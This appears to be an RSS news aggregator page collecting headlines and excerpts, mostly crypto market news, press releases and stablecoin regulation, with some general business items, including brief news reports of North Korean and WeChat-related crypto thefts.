Date of publish: Sun, 29 Jun 2025 13:55:18 +0000

Cross-Compiling Common Lisp for Windows

Article URL: https://www.fosskers.ca/en/blog/cl-windows

Comments URL: https://news.ycombinator.com/item?id=44401358

Points: 47

# Comments: 1

Article link

Date of publish: Fri, 27 Jun 2025 23:55:22 +0000

Jane Austen's Boldest Novel Is Also Her Least Understood

Article URL: https://www.nytimes.com/2025/06/27/books/review/jane-austen-mansfield-park.html

Comments URL: https://news.ycombinator.com/item?id=44401350

Points: 59

# Comments: 11

Article link

Date of publish: Fri, 27 Jun 2025 23:54:29 +0000

Business RSS

Business sites below.

CryptoCurrencyNews

Elliptic’s ‘Data Fabric’ transforms access to digital asset data and intelligence with Industry’s first ‘data as a service’ (DaaS) model

‘Elliptic Data Fabric’ enables customers to embed data directly into their own data lakes, workflows and AI models for real-time digital asset decisioning LONDON, June 27, 2025 /PRNewswire/ — Elliptic, the global leader in digital asset decisioning, has announced an industry first, offering direct access to its market-leading datasets and intelligence, ‘Elliptic Data Fabric,’ via subscription.  … Continue reading "Elliptic’s ‘Data Fabric’ transforms access to digital asset data and intelligence with Industry’s first ‘data as a service’ (DaaS) model"

Article link

Date of publish: Sun, 29 Jun 2025 16:19:08 +0000

Cango Inc. Announces Closing of Share-Settled Crypto Mining Assets Acquisitions

HONG KONG, June 27, 2025 /PRNewswire/ — Cango Inc. (NYSE: CANG) (“Cango” or the “Company”) today announced that it has completed the previously announced acquisitions of on-rack crypto mining machines with an aggregate hashrate of 18 Exahash per second through issuance of 146,670,925 Class A ordinary shares of the Company to the sellers in proportion … Continue reading "Cango Inc. Announces Closing of Share-Settled Crypto Mining Assets Acquisitions"

Article link

Date of publish: Sat, 28 Jun 2025 16:19:07 +0000

Bybit & Block Scholes Report: GENIUS Act Aims to “Reinvent the Dollar” and Solidify US Leadership in Digital Assets

DUBAI, UAE, June 27, 2025 /PRNewswire/ — Bybit, the world’s second-largest cryptocurrency exchange by trading volume, today released a new crypto insights report with Block Scholes, revealing how landmark U.S. legislative proposals like the GENIUS Act are set to reinforce the U.S. dollar’s global dominance and rewire the international financial order. The report analyzes a new wave … Continue reading "Bybit & Block Scholes Report: GENIUS Act Aims to “Reinvent the Dollar” and Solidify US Leadership in Digital Assets"

Article link

Date of publish: Fri, 27 Jun 2025 16:19:17 +0000

Cointelegraph.com News

Bitcoin ‘bull pennant’ eyes $165K, Pomp scoops up $386M BTC: Hodler’s Digest, June 22 – 28

XRP jumped just hours after the company said it is dropping its SEC cross-appeal, Anthony Pompliano makes large Bitcoin buy: Hodler’s Digest

XRPs price jumped over 3% on Friday, just hours after Ripple Labs CEO Brad Garlinghouse said the company is dropping its cross-appeal against the US Securities and Exchange Commission (SEC) and expects the regulator to do the same.

Ripple is dropping our cross-appeal, and the SEC is expected to drop their appeal, as theyve previously said, Garlinghouse said in an X post on Friday. XRP, the cryptocurrency associated with Ripple Labs, spiked 3.36% to $2.18 just five hours after the post, according to CoinMarketCap data.

Were closing this chapter once and for all and focusing on whats most important building the internet of Value. Lock in, Garlinghouse added.

Read more

Article link

Date of publish: Sun, 29 Jun 2025 00:46:39 +0100

North Korea crypto hackers tap ChatGPT, Malaysia road money siphoned: Asia Express

ChatGPT automates North Korea’s crypto hacks. Malaysian highway funds funneled to digital assets. Asia Express

North Koreas state-sponsored hacking groups are automating cryptocurrency theft with the help of AI tools like ChatGPT, according to South Korean cybersecurity officials.

Lee Seul-gi, lead researcher at the Korea Internet & Security Agency (KISA), said attackers are using AI-configured scripts to automatically transfer crypto to their own wallets once a victims balance exceeds $200.

During a security conference in Seoul on Thursday, Lee shared the findings of an investigation that analyzed 39 virtual server images seized in September, according to local media.

Read more

Article link

Date of publish: Fri, 27 Jun 2025 00:06:05 +0100

GENIUS Act reopens the door for a Meta stablecoin, but will it work?

The US GENIUS stablecoin act could open the door for a flood of Big Tech digital currencies. There are challenges though.

The GENIUS Act will enable tech companies to issue stablecoins that functionally blur the boundary between public and private money.

But Winston Ma, adjunct law professor at New York University, argues that private stablecoins cannot function as true currency without sovereign enforcement. Yuriy Brisov, a lawyer at Digital & Analogue Partners, contends that privately issued currencies can serve as legitimate alternatives to traditional monetary systems.

To understand the legal implications of the GENIUS Act and how it fits into the global stablecoin landscape, Magazine spoke with Brisov in Europe, Ma in the US and Joshua Chu, co-chair of the Hong Kong Web3 Association.

Read more

Article link

Date of publish: Thu, 26 Jun 2025 15:30:00 +0100

News Ticker - markets.businessinsider.com

EQS-CMS: Scout24 SE: Release of a capital market information

<table border="0"><tr><td> EQS Post-admission Duties announcement: Scout24 SE / Announcement corresponding to Art. 5 para. 1 lit. b), para. 3 of Regulation (EU) No 596/2014 in its current version and Art. 2 para. 3 of Delegated Regulation (EU) 2016/1052 <br/> Scout24 SE: Release of a capital market information...

Article link

Date of publish: Mon, 30 Jun 2025 12:09:03 GMT

Ashvattha Therapeutics Presents Positive Interim Phase 2 Results for Subcutaneous Migaldendranib Treatment for DME and Wet-AMD at 2025 MaculArt Meeting

<link type="text/css" rel="stylesheet" href="https://www.globenewswire.com/styles/gnw_nitf.css" /><p align="center"><em>Monthly subcutaneous migaldendranib shows favorable safety with sustained efficacy through 24 weeks in patients with DME and wet-AMD </em><p align="center"><em>Novel subcutaneous delivery may offer a more patient-friendly...

Article link

Date of publish: Mon, 30 Jun 2025 12:05:00 GMT

HighPeak Energy, Inc. Announces Proposed Aggregate $725 Million Private Offering of Senior Notes

<link type="text/css" rel="stylesheet" href="https://www.globenewswire.com/styles/gnw_nitf.css" /><p align="justify">FORT WORTH, Texas, June 30, 2025 (GLOBE NEWSWIRE) -- HighPeak Energy, Inc. ("HighPeak" or the "Company") (NASDAQ: HPK) today announced that it intends to offer, subject to market and customary conditions, $725 million aggregate...

Article link

Date of publish: Mon, 30 Jun 2025 12:01:41 GMT

BBC News

Lifetime ISAs leave some with less money than they put in

MPs call for reform to the savings account which aims to help people save towards retirement or a first home.

Article link

Date of publish: Mon, 30 Jun 2025 12:23:20 GMT

Calls for inquiry as 420 refinery jobs at risk

The government says workers at the Lindsey plant in Lincolnshire have been "badly let down".

Article link

Date of publish: Mon, 30 Jun 2025 14:18:04 GMT

Boeing's 787 Dreamliner was deemed the 'safest' of planes. The whistleblowers were always less sure

Long before the Air India tragedy, the cause of which is still to be determined, people who had worked on the 787 had raised concerns about the production standards

Article link

Date of publish: Sun, 29 Jun 2025 22:57:37 GMT

The world this week

The weekly cartoon

Article link

Date of publish: Thu, 26 Jun 2025 12:43:33 +0000

Business

Article link

Date of publish: Thu, 26 Jun 2025 12:43:33 +0000

Politics

Article link

Date of publish: Thu, 26 Jun 2025 12:43:33 +0000

Fortune | FORTUNE

Bitcoin and crypto investors hit with flood of IRS letters, say tax experts

Crypto tax platform CoinLedger cites a ninefold increase in users asking about IRS letters.

Article link

Date of publish: Sun, 29 Jun 2025 13:40:36 +0000

Serena Williams says talent alone only gets you so far: For career success, like tennis, you have to grind ‘every day’

The 43-year-old tennis icon says humility and perseverance are key to success, echoing other leaders like Brian Niccol, Steve Jobs, and Mark Cuban.

Article link

Date of publish: Mon, 30 Jun 2025 14:39:21 +0000

Falling home prices are raising the risk of a deeper correction as the housing market cracks under high mortgage rates

The latest Case-Shiller home price report showed a 0.3% monthly fall in the 20-city index in April, steeper than March's downwardly revised 0.2% dip.

Article link

Date of publish: Sat, 28 Jun 2025 19:45:26 +0000

All News

FX-hedged stocks seen outperforming as euro rises, says Morgan Stanley

Article link

Date of publish: 2025-06-30 14:36:24

Wolfe upgrades Medtronic as pulsed field ablation may jolt near term growth

Article link

Date of publish: 2025-06-30 14:29:25

Bitcoin price today: erases gains after briefly rising near $109k; up 3.5% in June

Article link

Date of publish: 2025-06-30 14:08:48

CryptoCurrencyNews

Elliptic’s ‘Data Fabric’ transforms access to digital asset data and intelligence with Industry’s first ‘data as a service’ (DaaS) model

‘Elliptic Data Fabric’ enables customers to embed data directly into their own data lakes, workflows and AI models for real-time digital asset decisioning LONDON, June 27, 2025 /PRNewswire/ — Elliptic, the global leader in digital asset decisioning, has announced an industry first, offering direct access to its market-leading datasets and intelligence, ‘Elliptic Data Fabric,’ via subscription.  … Continue reading "Elliptic’s ‘Data Fabric’ transforms access to digital asset data and intelligence with Industry’s first ‘data as a service’ (DaaS) model"

Article link

Date of publish: Sun, 29 Jun 2025 16:19:08 +0000

Cango Inc. Announces Closing of Share-Settled Crypto Mining Assets Acquisitions

HONG KONG, June 27, 2025 /PRNewswire/ — Cango Inc. (NYSE: CANG) (“Cango” or the “Company”) today announced that it has completed the previously announced acquisitions of on-rack crypto mining machines with an aggregate hashrate of 18 Exahash per second through issuance of 146,670,925 Class A ordinary shares of the Company to the sellers in proportion … Continue reading "Cango Inc. Announces Closing of Share-Settled Crypto Mining Assets Acquisitions"

Article link

Date of publish: Sat, 28 Jun 2025 16:19:07 +0000

Bybit & Block Scholes Report: GENIUS Act Aims to “Reinvent the Dollar” and Solidify US Leadership in Digital Assets

DUBAI, UAE, June 27, 2025 /PRNewswire/ — Bybit, the world’s second-largest cryptocurrency exchange by trading volume, today released a new crypto insights report with Block Scholes, revealing how landmark U.S. legislative proposals like the GENIUS Act are set to reinforce the U.S. dollar’s global dominance and rewire the international financial order. The report analyzes a new wave … Continue reading "Bybit & Block Scholes Report: GENIUS Act Aims to “Reinvent the Dollar” and Solidify US Leadership in Digital Assets"

Article link

Date of publish: Fri, 27 Jun 2025 16:19:17 +0000

Protocol Camp Announces Upcoming New Edition to Empower Web3 Innovators Across Asia

SEOUL, South Korea, June 26, 2025 /PRNewswire/ — Protocol Camp, Asia’s leading Web3 bootcamp originally launched in South Korea, is returning with a unified, expanded format. The upcoming edition merges the Korea and Southeast Asia programs into a single initiative aimed at delivering greater impact for blockchain developers and entrepreneurs across the continent. Originally hosted … Continue reading "Protocol Camp Announces Upcoming New Edition to Empower Web3 Innovators Across Asia"

Article link

Date of publish: Thu, 26 Jun 2025 16:19:18 +0000

3iQ Recognized as “Best Digital Asset Investment Manager”, “Best Bitcoin ETF Issuer” and “Fund Manager Innovator of the Year” at 2025 Industry Awards

TORONTO, June 25, 2025 /PRNewswire/ — 3iQ Corp. (“3iQ”), a global pioneer in digital asset investment solutions, is pleased to announce it has won awards at three different industry ceremonies, solidifying its position as a leader in the provision of transparent, well-managed and regulated digital asset investment products. As the first regulated digital asset investment … Continue reading "3iQ Recognized as “Best Digital Asset Investment Manager”, “Best Bitcoin ETF Issuer” and “Fund Manager Innovator of the Year” at 2025 Industry Awards"

Article link

Date of publish: Wed, 25 Jun 2025 16:19:43 +0000

Bitcoin Price Forecast Eyes $110K Breakout

Bitcoin
The Bitcoin price forecast is gaining bullish momentum as BTC rebounds strongly from weekend losses, trading at around $106,839. With geopolitical tensions easing—particularly the ceasefire between Israel and Iran—investors appear more confident, propelling cryptocurrencies into recovery mode. Leading the charge is Bitcoin (CRYPTO:BTC), backed by solid institutional flows and rising spot ETF interest. Meanwhile, altcoins … Continue reading "Bitcoin Price Forecast Eyes $110K Breakout"

Article link

Date of publish: Wed, 25 Jun 2025 13:31:53 +0000

How Coinbase Is Driving Crypto Adoption in Germany

crypto adoption
Germany is known for its financial conservatism, but crypto adoption in Germany is quietly gaining momentum—thanks in part to Coinbase’s strategic push. Leading the charge is Denny Morawiak, Coinbase’s country director, who’s working hard to change how affluent Germans view Bitcoin (CRYPTO:BTC), Ethereum (CRYPTO:ETH), and even the more playful corners of the crypto market like … Continue reading "How Coinbase Is Driving Crypto Adoption in Germany"

Article link

Date of publish: Wed, 25 Jun 2025 13:18:31 +0000

KuCoin Achieves AAA Rating on CER.live, Solidifying Position as a Top Secure Cryptocurrency Exchange

VICTORIA, Seychelles, June 24, 2025 /PRNewswire/ — KuCoin, a leading global cryptocurrency exchange, proudly announces its prestigious AAA rating on CER.live, a renowned cybersecurity ranking platform for cryptocurrency projects. This accolade positions KuCoin as the top 6 most secure exchanges worldwide, reflecting its unwavering commitment to user protection and operational excellence. With a 90% security … Continue reading "KuCoin Achieves AAA Rating on CER.live, Solidifying Position as a Top Secure Cryptocurrency Exchange"

Article link

Date of publish: Tue, 24 Jun 2025 16:19:07 +0000

XRP Price Recovery: 3 Bullish Signals Amid Volatility

XRP price
Despite geopolitical tensions rattling global markets, XRP price recovery may be closer than it seems. Last week, Ripple’s XRP (XRP) slid roughly 8% amid escalating Middle East conflict, as traders reacted to U.S. airstrikes in Iran. But even with macro uncertainty weighing on sentiment, several key indicators—technical, on-chain, and institutional—are flashing bullish signals for XRP. … Continue reading "XRP Price Recovery: 3 Bullish Signals Amid Volatility"

Article link

Date of publish: Mon, 23 Jun 2025 20:17:24 +0000

Iran Bitcoin Sales: Fueling Conflict or Overblown Fear?

bitcoin
The role of Iran Bitcoin sales in funding its military ambitions has once again come under scrutiny amid rising geopolitical tensions. A controversial claim by investor Mike Alfred alleges that Iran is rapidly offloading Bitcoin—allegedly obtained through cyberattacks—to finance its missile programs and nuclear infrastructure. While dramatic, the accuracy and implications of this claim are … Continue reading "Iran Bitcoin Sales: Fueling Conflict or Overblown Fear?"

Article link

Date of publish: Mon, 23 Jun 2025 20:13:40 +0000

Antier Shatters DeFi Boundaries: Debuts Enterprise-Level Stablecoin Remittance Solution

NEW DELHI, June 23, 2025 /PRNewswire/ — Antier, the global leader in blockchain product development, announces the launch of its enterprise-ready stablecoin remittance platform, built for institutions demanding precision, control, and velocity in cross-border value exchange. As the world’s most trusted stablecoin development company, Antier delivers a modular, production-grade stack that modernizes the movement of … Continue reading "Antier Shatters DeFi Boundaries: Debuts Enterprise-Level Stablecoin Remittance Solution"

Article link

Date of publish: Mon, 23 Jun 2025 16:19:08 +0000

Flipster and Aptos Foundation Partner to Drive Stablecoin Adoption and Unlock Multichain Opportunities

PANAMA CITY, June 20, 2025 /PRNewswire/ — Flipster, a global cryptocurrency trading platform, has partnered with the Aptos Foundation to accelerate stablecoin adoption and enhance multichain capital access worldwide — empowering traders with faster, more accessible, and more flexible ways to participate in global blockchain ecosystems and seize market opportunities across different chains. As a … Continue reading "Flipster and Aptos Foundation Partner to Drive Stablecoin Adoption and Unlock Multichain Opportunities"

Article link

Date of publish: Sun, 22 Jun 2025 16:19:08 +0000

Enkrypt integrates SPACE ID’s Payment ID for seamless CEX transfers

Full SDK integration radically simplifies crypto transfers across leading chains SINGAPORE, June 20, 2025 /PRNewswire/ — Leading digital identity platform SPACE ID is pleased to announce that Enkrypt, the multi-chain wallet developed by MyEtherWallet (MEW), has integrated its Payment ID solution, which allows Enkrypt users to send crypto to any centralized exchange (CEX) on any … Continue reading "Enkrypt integrates SPACE ID’s Payment ID for seamless CEX transfers"

Article link

Date of publish: Sat, 21 Jun 2025 16:19:07 +0000

South Korea Crypto Crisis Fuels Youth Shift

crypto crisis
South Korea is witnessing a massive surge in cryptocurrency adoption, but not for the reasons many might expect. The real driver behind the boom isn’t a belief in blockchain innovation or faith in Web3—it’s the South Korea crypto crisis that’s gripping an entire generation of young people struggling to survive in a broken economic landscape. … Continue reading "South Korea Crypto Crisis Fuels Youth Shift"

Article link

Date of publish: Fri, 20 Jun 2025 19:53:02 +0000

Trump Crypto Investment Makes Toymaker Surge

trump crypto investment
A forgotten toy company just exploded onto the crypto scene, and it’s all thanks to a Trump crypto investment that turned $5 million into $127 million overnight. SRM Entertainment (NASDAQ:SRM), once known for selling Smurf-themed tumblers and plush koalas, is now making headlines as one of the hottest speculative crypto stocks of the year. How … Continue reading "Trump Crypto Investment Makes Toymaker Surge"

Article link

Date of publish: Fri, 20 Jun 2025 19:41:19 +0000

GRVT Hits $8B Total Trading Volume, Partners with rhino.fi to Enhance Cross-Chain Self-Custodial Trading

HAMILTON, Bermuda, June 19, 2025 /PRNewswire/ — GRVT, the world’s first licensed onchain exchange, is teaming up with rhino.fi, a leading intent based liquidity network for seamless cross-chain access experience across both EVM and non-EVM networks. Users can now deposit to and withdraw from GRVT directly using BSC, Arbitrum, Solana or TRON via rhino.fi, which can … Continue reading "GRVT Hits $8B Total Trading Volume, Partners with rhino.fi to Enhance Cross-Chain Self-Custodial Trading"

Article link

Date of publish: Fri, 20 Jun 2025 16:19:12 +0000

IP Crypto Price Drops as Story Hype Fades

crypto price
IP crypto price continues to fall after early hype wears off, with weak adoption, macro pressure, and profit-taking weighing on Story Protocol’s token. Why Is the IP Crypto Price Falling Today? After a promising launch and an explosive price rally, the IP crypto price tied to the Story Protocol is facing a sharp and sustained … Continue reading "IP Crypto Price Drops as Story Hype Fades"

Article link

Date of publish: Thu, 19 Jun 2025 18:06:53 +0000

Trump Crypto Project Faces Silent Retreat

trump crypto investment
The Trump crypto project is losing steam as the family quietly reduces its stake in World Liberty Financial, raising fresh doubts about its long-term vision. Trump’s Crypto Move: A Quiet Exit Signals Uncertainty World Liberty Financial, the flashy crypto venture tied to the Trump family, is raising eyebrows again—but not for the usual reasons. A … Continue reading "Trump Crypto Project Faces Silent Retreat"

Article link

Date of publish: Thu, 19 Jun 2025 18:01:38 +0000

KuCoin Joins BitGo Singapore’s Go Network for Off-Exchange Settlement, Reinforcing $2 Billion Trust Project

VICTORIA, Seychelles, June 19, 2025 /PRNewswire/ — KuCoin, a leading global cryptocurrency exchange with over 41 million users, today announced its integration and exchange partnership with BitGo Singapore Pte. Ltd. (“BitGo Singapore”), a subsidiary of BitGo, Inc., through its Go Network for Off-Exchange Settlement (OES) platform. This collaboration marks another significant step in KuCoin’s $2 … Continue reading "KuCoin Joins BitGo Singapore’s Go Network for Off-Exchange Settlement, Reinforcing $2 Billion Trust Project"

Article link

Date of publish: Thu, 19 Jun 2025 16:19:07 +0000

Stablecoin Bill Boosts Coinbase Stock 16%

stablecoin
The crypto market roared back to life this week as a key development in stablecoin regulation triggered a bullish wave across digital asset stocks. Leading the charge was Coinbase Global Inc. (NASDAQ:COIN), whose stock spiked as much as 17% to $297.44 on Wednesday following the U.S. Senate’s passage of the GENIUS Act — a landmark … Continue reading "Stablecoin Bill Boosts Coinbase Stock 16%"

Article link

Date of publish: Wed, 18 Jun 2025 20:30:41 +0000

Crypto Scam Busted: $300K Frozen in New York

crypto scam
New York State officials have cracked down on a major crypto scam, freezing $300,000 and recovering another $140,000 in stolen cryptocurrency. The fraudulent scheme, which targeted Russian-speaking individuals through fake social media ads, has resulted in over $1 million in losses—mostly in Brooklyn. According to a joint statement released Wednesday by the Brooklyn District Attorney’s … Continue reading "Crypto Scam Busted: $300K Frozen in New York"

Article link

Date of publish: Wed, 18 Jun 2025 20:19:54 +0000

CoinDesk Overnight Rates (CDOR) to Support Stablecoin Money Markets based on Aave

These first-of-kind money market rates transform Aave pool activity into conventional overnight rates to support interest rate derivatives and floating rate loans. NEW YORK, June 17, 2025 /CNW/ — CoinDesk Indices, a leading provider of digital-asset benchmarks, in collaboration with Sentora, a pioneer in institutional DeFi solutions, today announced the launch of CoinDesk Overnight Rates … Continue reading "CoinDesk Overnight Rates (CDOR) to Support Stablecoin Money Markets based on Aave"

Article link

Date of publish: Wed, 18 Jun 2025 16:19:08 +0000

Top 4 Best Cheap Crypto to Buy Right Now

crypto price
The search for the best cheap crypto to buy has never been more intense. With Bitcoin dominance surging and over $33 billion in stablecoin liquidity waiting on the sidelines, savvy investors are turning their attention to promising crypto presales backed by solid fundamentals and strong tokenomics. According to Ian Balina, CEO of Token Metrics, the … Continue reading "Top 4 Best Cheap Crypto to Buy Right Now"

Article link

Date of publish: Tue, 17 Jun 2025 20:15:58 +0000

Coinbase Pushes for SEC Approval on Tokenized Equities

tokenized equities
Coinbase (NASDAQ:COIN) is making a bold move that could reshape the future of stock trading in the United States. The crypto exchange is seeking approval from the U.S. Securities and Exchange Commission (SEC) to offer tokenized equities—digital representations of stocks issued and traded on the blockchain. If the SEC greenlights the request, Coinbase would be … Continue reading "Coinbase Pushes for SEC Approval on Tokenized Equities"

Article link

Date of publish: Tue, 17 Jun 2025 19:54:29 +0000

Bybit & Block Scholes: ETH-BTC volatility hits five-year high as ETH plays catch-up

DUBAI, UAE, June 17, 2025 /PRNewswire/ — Bybit, the world’s second-largest cryptocurrency exchange by trading volume, released a new options volatility report in collaboration with Block Scholes. The report shows a historic volatility divergence between Ethereum (ETH) and Bitcoin (BTC) during May 2025. Key Highlights: In May 2025, ETH options exhibited historically high volatility premiums over BTC, … Continue reading "Bybit & Block Scholes: ETH-BTC volatility hits five-year high as ETH plays catch-up"

Article link

Date of publish: Tue, 17 Jun 2025 16:19:12 +0000

Tron Reverse Merger Sends SRM Stock Soaring

trump crypto investment
Justin Sun’s Tron reverse merger strategy is making waves across the crypto and stock markets. On Monday, Nasdaq-listed SRM Entertainment (NASDAQ:SRM) announced it had reached a landmark agreement with the blockchain platform Tron, triggering a massive rally in SRM stock. This deal is no ordinary partnership—it involves a $100 million equity investment, a name change … Continue reading "Tron Reverse Merger Sends SRM Stock Soaring"

Article link

Date of publish: Mon, 16 Jun 2025 20:21:37 +0000

Trump Media Bitcoin ETF Faces Big Competition

Bitcoin ETF
Trump Media bitcoin ETF plans are making headlines again as Trump Media & Technology Group (NASDAQ:DJT) filed a proposal to launch a new exchange-traded fund investing in both bitcoin and ethereum. This move marks the company’s second crypto ETF filing in just two weeks, signaling a serious push into digital asset markets. The latest filing … Continue reading "Trump Media Bitcoin ETF Faces Big Competition"

Article link

Date of publish: Mon, 16 Jun 2025 20:11:58 +0000

Introducing CoolWallet Go: The Smarter Start to Crypto Security

The first step to self-custody. Experience a new level of intuitive, secure mobile cold wallet. TAIPEI, June 16, 2025 /PRNewswire/ — CoolBitX proudly introduces CoolWallet Go, a next-generation entry-level cold wallet designed to make crypto security more accessible than ever. Staying true to the brand’s commitment to safety and simplicity, CoolWallet Go features its signature … Continue reading "Introducing CoolWallet Go: The Smarter Start to Crypto Security"

Article link

Date of publish: Mon, 16 Jun 2025 16:19:08 +0000

Klein Funding and Bybit Partner to Launch a New Era of Crypto Prop Trading

LONDON, June 14, 2025 /PRNewswire/ — In 2024, Klein Funding became the first crypto-only prop firm to officially partner with Bybit, one of the world’s leading cryptocurrency exchanges. Far from a marketing move, this collaboration marked a structural shift in how crypto prop trading is approached: real tools, real markets, and a model centered on trader … Continue reading "Klein Funding and Bybit Partner to Launch a New Era of Crypto Prop Trading"

Article link

Date of publish: Sun, 15 Jun 2025 16:19:08 +0000

BingX Launchpool to Introduce SG Coin (SGC) with Early Access Rewards

PANAMA CITY, June 13, 2025 /PRNewswire/ — BingX, a leading cryptocurrency exchange and Web3 AI company, is expanding its reach into the gaming ecosystem with the introduction of SG Coin (SGC) through its Launchpool. This Launchpool brings SG Coin to a broader market, marking an exciting leap forward for both BingX and blockchain-powered gaming. From June … Continue reading "BingX Launchpool to Introduce SG Coin (SGC) with Early Access Rewards"

Article link

Date of publish: Sat, 14 Jun 2025 16:19:08 +0000

Cointelegraph.com News

Bitcoin ‘bull pennant’ eyes $165K, Pomp scoops up $386M BTC: Hodler’s Digest, June 22 – 28

XRP jumped just hours after the company said it is dropping its SEC cross-appeal, Anthony Pompliano makes large Bitcoin buy: Hodler’s Digest

XRPs price jumped over 3% on Friday, just hours after Ripple Labs CEO Brad Garlinghouse said the company is dropping its cross-appeal against the US Securities and Exchange Commission (SEC) and expects the regulator to do the same.

Ripple is dropping our cross-appeal, and the SEC is expected to drop their appeal, as theyve previously said, Garlinghouse said in an X post on Friday. XRP, the cryptocurrency associated with Ripple Labs, spiked 3.36% to $2.18 just five hours after the post, according to CoinMarketCap data.

Were closing this chapter once and for all and focusing on whats most important building the internet of Value. Lock in, Garlinghouse added.

Read more

Article link

Date of publish: Sun, 29 Jun 2025 00:46:39 +0100

North Korea crypto hackers tap ChatGPT, Malaysia road money siphoned: Asia Express

ChatGPT automates North Korea’s crypto hacks. Malaysian highway funds funneled to digital assets. Asia Express

North Koreas state-sponsored hacking groups are automating cryptocurrency theft with the help of AI tools like ChatGPT, according to South Korean cybersecurity officials.

Lee Seul-gi, lead researcher at the Korea Internet & Security Agency (KISA), said attackers are using AI-configured scripts to automatically transfer crypto to their own wallets once a victims balance exceeds $200.

During a security conference in Seoul on Thursday, Lee shared the findings of an investigation that analyzed 39 virtual server images seized in September, according to local media.

Read more

Article link

Date of publish: Fri, 27 Jun 2025 00:06:05 +0100

GENIUS Act reopens the door for a Meta stablecoin, but will it work?

The US GENIUS stablecoin act could open the door for a flood of Big Tech digital currencies. There are challenges though.

The GENIUS Act will enable tech companies to issue stablecoins that functionally blur the boundary between public and private money.

But Winston Ma, adjunct law professor at New York University, argues that private stablecoins cannot function as true currency without sovereign enforcement. Yuriy Brisov, a lawyer at Digital & Analogue Partners, contends that privately issued currencies can serve as legitimate alternatives to traditional monetary systems.

To understand the legal implications of the GENIUS Act and how it fits into the global stablecoin landscape, Magazine spoke with Brisov in Europe, Ma in the US and Joshua Chu, co-chair of the Hong Kong Web3 Association.

Read more

Article link

Date of publish: Thu, 26 Jun 2025 15:30:00 +0100

Why being a Gen Z crypto founder is a ‘blessing and a curse’

Too young to be taken seriously, too bold to be ignored. Meet some of the young crypto entrepreneurs fighting to make their mark in crypto.

Josh Benaron, founder of Irys, recalls being ridiculed when he tried to raise funds for his crypto venture at 19. For years, hes had to fight to be taken seriously.

Before becoming a founder, I struggled to get access to opportunities within crypto. I was introduced to the [chief technology officer] of one of the largest European CEXs, and he practically laughed me out of the room because of my age, Benaron tells Magazine.

In general, when you raise money, being young doesnt help, as they associate youth with inexperience and immaturity.

Read more

Article link

Date of publish: Wed, 25 Jun 2025 15:30:00 +0100

MapleStory apologizes for cheaters, Tokyo Beast blows up in Japan, FIFA Rivals: Web3 Gamer

MapleStory Universe battles with cheaters, Tokyo Beast explodes on the Japan App Store, and FIFA Rivals review: Web3 Gamer

The hacker problem in MapleStory Universe is getting worse, with execs issuing apologies to players for how its been handled.

MapleStory Universe head of strategy Keith Kim said theres been an aggressive spike in attempts to exploit the game, mostly involving exploiting character skills and network tampering.

These are not isolated incidents. They compromise the experience for everyone.

Read more

Article link

Date of publish: Tue, 24 Jun 2025 15:30:00 +0100

History suggests Bitcoin taps $330K, crypto ETF odds hit 90%: Hodler’s Digest, June 15 – 21

A Bitcoin technical analyst says the historical Bitcoin trend signals $330K BTC price, US crypto ETF predictions: Hodler’s Digest

The likelihood of US regulators approving a wave of crypto exchange-traded funds (ETFs) is now a near certainty, signaling a continued pro-crypto shift at the Securities and Exchange Commission (SEC), according to Bloomberg analysts Erich Balchunas and James Seyffart.

In a social media post on Friday, Seffart said he and Balchunas have raised their odds for the vast majority of crypto ETF approvals to 90% or higher, citing very positive engagement from the SEC.

The analysts also suggested that the SEC likely views cryptocurrencies such as Litecoin, Solana, XRP and Dogecoin as commodities a designation that would place them outside of its immediate jurisdiction.

Read more

Article link

Date of publish: Sun, 22 Jun 2025 00:42:14 +0100

WeChat friends help crypto thieves, Korbit denies hack: Asia Express

WeChat hackers use victims’ friends to steal crypto. South Korean exchange Korbit denies hack after 12-hour maintenance.

Chinese social media influencers have been targeted in a wave of WeChat account hacks, with attackers suspected of exploiting the messaging platforms security feature meant to keep them out.

Since April, multiple victims claim hackers gained access to their WeChat login credentials and then triggered the platforms friend verification system. This security feature, one of three login options on WeChat, allows a users contacts to receive verification requests on their behalf when logging into a new device. Its intended as a backup when SMS or QR code authentication is unavailable.

Cos, co-founder of blockchain security firm SlowMist, broke down the method in a June 17 post on X. He noted that attackers appear to target contacts with whom victims had minimal interaction, increasing the chances those users might mindlessly approve the request and forward the code.

Read more

Article link

Date of publish: Fri, 20 Jun 2025 00:02:09 +0100

New York’s PubKey Bitcoin bar will orange-pill Washington DC next

PubKey has cemented itself as a cultural hub for NYC’s Bitcoin community, offering craft beers, cocktails and orange pills.

Tucked away on a not-so-busy street in the Greenwich Village neighborhood of Manhattan is a bar that has grown to become a dominant cultural force among New York Citys Bitcoin community. 

PubKey, a Bitcoin-centric dive bar, offers craft beers, cocktails, a food menu prepared by a world-renowned chef and the chance to be orange-pilled by some of Bitcoins most vocal proponents.

At first glance, its not entirely obvious to outsiders that it is a Bitcoin bar. Thomas Pacchia, one of PubKeys owners, estimates that roughly 80% of PubKeys patrons dont even know its a Bitcoin bar. They just see it as a cool neighborhood tavern.

We try to bury a lot of the Bitcoin elements to a certain extent because, I would say, for most people, Bitcoin is off-putting, he explains.

Read more

Article link

Date of publish: Thu, 19 Jun 2025 15:30:00 +0100

Bitcoin’s invisible tug-of-war between suits and cypherpunks

Bitcoin purists are sounding the alarm as Wall Street suits pile into their beloved ecosystem. But who’s set to change: Bitcoin or TradFi?

At a recent Bitcoin conference in Las Vegas, there were so many government and TradFi attendees that Bitcoin purists are starting to worry theyre losing their peer-to-peer digital cash system to the suits.

From BlackRocks initial move for a spot Bitcoin exchange-traded fund in the summer of 2023 to US President Donald Trumps embrace of crypto, all signs indicate the institutions are finally here.

The years of Bitcoiners clamoring for institutional investors and pursuing price appreciation more proactively than privacy, self-custody, and other cypherpunk ideals have led to Bitcoin rapidly becoming just another TradFi instrument, Cake Wallet vice president Seth For Privacy tells Magazine.

Read more

Article link

Date of publish: Wed, 18 Jun 2025 15:30:00 +0100

Arthur Hayes doesn’t care when his Bitcoin predictions are totally wrong

BitMEX co-founder and Bitcoin billionaire Arthur Hayes loves making daring Bitcoin predictions, but doesn’t sweat when he gets them wrong.


BitMEX co-founder and Bitcoin billionaire Arthur Hayes is known for making big, bold and sometimes controversial Bitcoin price predictions, and says it doesnt faze him when he gets it wrong. 

Nothing really happens, Hayes tells Magazine, who asked if he worries about backlash when his Bitcoin predictions fall flat. 

The youngest African-American crypto billionaire in history is the first to admit that most of his price calls dont land. I get it wrong, and Ive gotten most of them wrong, he laughs.

Read more

Article link

Date of publish: Tue, 17 Jun 2025 15:30:00 +0100

